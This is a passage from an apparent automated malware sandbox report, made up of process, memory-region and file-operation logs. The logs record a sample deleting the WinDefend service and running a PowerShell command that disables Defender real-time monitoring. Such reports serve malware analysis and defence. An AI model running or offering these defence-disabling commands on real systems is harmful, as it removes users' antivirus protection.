| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 28 |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\sc.exe | base_address = 0xda0000 |
|
1 |
Service (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Delete | service_name = WinDefend |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-02-06 16:42:23 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 183207 |
|
1 |
Process #22: powershell.exe
797
0
| Information | Value |
|---|---|
| ID | #22 |
| File Name | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:08, Reason: Child Process |
| Unmonitor | End Time: 00:02:34, Reason: Self Terminated |
| Monitor Duration | 00:00:26 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb50 |
| Parent PID | 0x318 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B68
0x
B7C
0x
B14
0x
B00
0x
AF8
0x
B10
0x
568
0x
294
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0003ffff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x0017ffff | Private Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x00180000 | 0x00182fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f1fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.1.db | 0x00200000 | 0x00203fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x00200000 | 0x00203fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db | 0x00210000 | 0x0022ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00270fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x00280000 | 0x00283fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00290fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x002f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00340000 | 0x0036ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x005f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000600000 | 0x00600000 | 0x00780fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x01b8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001b90000 | 0x01b90000 | 0x01c6efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c70000 | 0x01c70000 | 0x01c7ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001c80000 | 0x01c80000 | 0x01c8ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001c90000 | 0x01c90000 | 0x01c9ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001ca0000 | 0x01ca0000 | 0x01caffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001cb0000 | 0x01cb0000 | 0x01ceffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001cf0000 | 0x01cf0000 | 0x01cfffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001d00000 | 0x01d00000 | 0x01d0ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001d10000 | 0x01d10000 | 0x01d4ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000001d50000 | 0x01d50000 | 0x01d5ffff | Private Memory | rw |
|
|
|
- |
| l_intl.nls | 0x01d60000 | 0x01d62fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001d70000 | 0x01d70000 | 0x01d7ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01d80000 | 0x0204efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002050000 | 0x02050000 | 0x02050fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002060000 | 0x02060000 | 0x0209ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000020a0000 | 0x020a0000 | 0x0219ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000021a0000 | 0x021a0000 | 0x02592fff | Pagefile Backed Memory | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x025a0000 | 0x02605fff | Memory Mapped File | r |
|
|
|
- |
| sorttbls.nlp | 0x02610000 | 0x02614fff | Memory Mapped File | r |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x02620000 | 0x02627fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000002630000 | 0x02630000 | 0x02630fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002650000 | 0x02650000 | 0x0268ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002690000 | 0x02690000 | 0x0272ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002750000 | 0x02750000 | 0x0278ffff | Private Memory | rw |
|
|
|
- |
| sortkey.nlp | 0x02790000 | 0x027d0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000027e0000 | 0x027e0000 | 0x0281ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002840000 | 0x02840000 | 0x0287ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028c0000 | 0x028c0000 | 0x028fffff | Private Memory | rw |
|
|
|
- |
| system.transactions.dll | 0x02900000 | 0x02942fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000002960000 | 0x02960000 | 0x0299ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029e0000 | 0x029e0000 | 0x02a1ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002a80000 | 0x02a80000 | 0x02abffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ae0000 | 0x02ae0000 | 0x02b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bc0000 | 0x02bc0000 | 0x02bcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bd0000 | 0x02bd0000 | 0x04bcffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x04bd0000 | 0x04eb1fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll.mui | 0x04ec0000 | 0x04f7ffff | Memory Mapped File | rw |
|
|
|
- |
| powershell.exe | 0x221c0000 | 0x22231fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.dll | 0x67aa0000 | 0x67ae2fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x71790000 | 0x72009fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x72010000 | 0x727abfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x727b0000 | 0x732a7fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x732b0000 | 0x7385afff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.dll | 0x73a30000 | 0x73d11fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x74220000 | 0x742bbfff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x742c0000 | 0x744f4fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x74740000 | 0x747c4fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x747d0000 | 0x7486afff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x74870000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x748f0000 | 0x748f9fff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x74900000 | 0x7490afff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x74910000 | 0x74928fff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x74930000 | 0x7499ffff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x749a0000 | 0x749a8fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x749c0000 | 0x749fafff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74a20000 | 0x74a28fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74a30000 | 0x74a7bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74a80000 | 0x74aa0fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74ab0000 | 0x74ba4fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x74bb0000 | 0x74bc5fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74bd0000 | 0x74d6dfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x74d70000 | 0x74d7afff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x74d80000 | 0x74d96fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x74da0000 | 0x74de9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x74e10000 | 0x74e34fff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x74e70000 | 0x74e9dfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x74ea0000 | 0x74f20fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75050000 | 0x750cffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x75220000 | 0x75233fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x75380000 | 0x75384fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75520000 | 0x75531fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75540000 | 0x755cefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75660000 | 0x756b6fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75b10000 | 0x75b54fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x75d70000 | 0x75f0cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76160000 | 0x762bbfff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x762c0000 | 0x762e6fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x764b0000 | 0x76532fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76770000 | 0x773b9fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 47 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
File (391)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
6 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Users\aETAdzjz | type = file_attributes |
|
1 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Windows\system32 | type = file_attributes |
|
7 | |
| Get Info | C:\Windows | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
